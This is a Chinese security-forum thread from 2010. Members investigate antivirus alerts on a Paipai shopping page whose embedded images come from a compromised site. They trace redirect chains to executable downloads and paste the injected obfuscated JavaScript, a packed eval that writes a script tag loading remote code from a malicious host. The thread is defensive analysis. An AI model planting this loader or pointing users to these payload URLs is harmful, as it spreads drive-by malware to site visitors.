囧一个paipai（4th继续更新）

schumi小粉

[i=s] 本帖最后由 Hopesky 于 2010-2-4 17:51 编辑 [/i]

hxxp://auction1.paipai.com/7231AE33000000000072375103ABC5BA


* avast! 实时防护操作报告
* 该文件是自动生成的
*
* 开始于: 2010年2月4日 15:59:10
*

2010-2-4 16:38:27        [img]http://www.mallshop.com.cn/taobao/shuju/b001.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:27        [img]http://www.mallshop.com.cn/taobao/shuju/m02.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m04.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m03.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/b007.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m06.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m04.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m15.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/pidai/Burberry02.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:28        [img]http://www.mallshop.com.cn/taobao/shuju/m11.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:29        [img]http://www.mallshop.com.cn/taobao/shuju/m03.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:29        [img]http://www.mallshop.com.cn/taobao/shuju/m08.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:29        [img]http://www.mallshop.com.cn/taobao/pidai/Burberry01.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:29        [img]http://www.mallshop.com.cn/taobao/shuju/m08b.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:29        [img]http://www.mallshop.com.cn/taobao/shuju/m13.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/shuju/m08a.gif[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/shuju/m16.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/shuju/b007.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/pidai/Burberry04.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/pidai/Burberry03.jpg[/img] [L] JS:MalHead-CI [Trj] (0)
2010-2-4 16:38:30        [img]http://www.mallshop.com.cn/taobao/shuju/m09.gif[/img] [L] JS:MalHead-CI [Trj] (0)

天使的愤怒

应该是误报吧~
微点主防没有反映。

幸福的猪猪

貌似真的挂马。。。


p.s. 不过，不是拍拍的域名被挂马。

从日志中随便提取一个网址进行解析得出：

hxxp://www.mallshop.com.cn/taobao/pidai/Burberry02.jpg

关于:hxxp://www.mallshop.com.cn/taobao/pidai/Burberry02.jpg解密的日志(全体输出 -  7):
Level  0>hxxp://www.mallshop.com.cn/taobao/pidai/Burberry02.jpg
Level  1>hxxp://bbs.xcdx169.net/include/log.js?FCXYXAJO
Level  2>hxxp://bbs.xcdx169.net/newbbs/logo.html?人05
Level  3>hxxp://bbs.xcdx169.net/newbbs/images.gif
Level  3>hxxp://bbs.xcdx169.net/newbbs/b.jpg
Level  3>hxxp://bbs.xcdx169.net/newbbs/a.jpg
Level  4>hxxp://www.xcrc114.com/photo/Data/74.exe ●
日志由 Redoce2.0第87次修正版于 2010-2-4 17:01:52 生成。

schumi小粉

hxxp://item.taobao.com/auction/item_detail-0db1-8517666c40aad1bd4f1496ecc3ee0c7c.jhtml?cm_cat=0

也是，杯具

Hopesky

回复 3# 幸福的猪猪


    我杯具的说：现在没有了~

Hopesky

回复 4# schumi小粉


    为什么我解不出来.........那张图片在哪里~

schumi小粉

回复 6# Hopesky

地址在日志里，附日志~

Hopesky

1. if(document.cookie.indexOf('helio')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='helio=Yes;path=/;expires='+expires.toGMTString()
   
2. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|LKNWXOFM|log|include|net|bbs'.split('|'),0,{}));}
   
3. document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/3044132.js"></script>');

复制代码

这个素虾米？

关于:hxxp://www.mallshop.com.cn/taobao/shuju/m13.gif解密的日志(全体输出 -  15):

Level  1>hxxp://www.4fuu.com/ad.js?HIRYRA
Level  2>hxxp://www.mallshop.com.cn/js/js.js
Level  3>hxxp://www.xiazaijia.com/soft/down.htm?1
Level  4>hxxp://www.xiazaijia.com/soft/#
Level  4>hxxp://www.xiazaijia.com/about.html?act=%e4%bb%b7%e6%a0%bc%e6%a0%87%e5%87%86
Level  4>hxxp://www.xiazaijia.com/tan/down.js
Level  5>hxxp://www.xiazaijia.com/tan/1
Level  5>hxxp://www.1dh.org/?t,_blank
Level  4>hxxp://115.239.225.237:8088/soft/setup.exe ●
Level  4>hxxp://img.duote.com/img/dot2.gif
Level  2>hxxp://www.mallshop.com.cn/js/tj.js
Level  1>hxxp://www.mallshop.com.cn/taobao/shuju/m13.gif
Level  1>hxxp://www.4fuu.com/ad.js?hiryra

By   XE鼓

schumi小粉

回复 8# Hopesky


    呵呵，我的小a也报了没停。。。。不好意思，不知道类安的是卡巴~~对不住了

Hopesky

1. if(document.cookie.indexOf('helio')==-1){
   
2. var expires=new Date();
   
3. expires.setTime(expires.getTime()+24*60*60*1000);
   
4. document.cookie='helio=Yes;
   
5. path=/;
   
6. expires='+expires.toGMTString()
   
7. eval(function(p,a,c,k,e,d){
   
8. e=function(c){
   
9. return c.toString(36)}if(!''.replace(/^/,String)){
   
10. while(c--){
    
11. d[c.toString(a)]=k[c]||c.toString(a)}
    
12. k=[function(e){
    
13. return d[e]}
    
14. ];
    
15. e=function(){
    
16. return'\\w+'}c=1}while(c--){
    
17. if(k[c]){
    
18. p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}
    
19. }
    
20. return p}
    
21. ('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|LKNWXOFM|log|include|net|bbs'.split('|'),0,{
    
22. }
    
23. ));
    
24. }
    
25. document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/3044132.js"></script>');
    

复制代码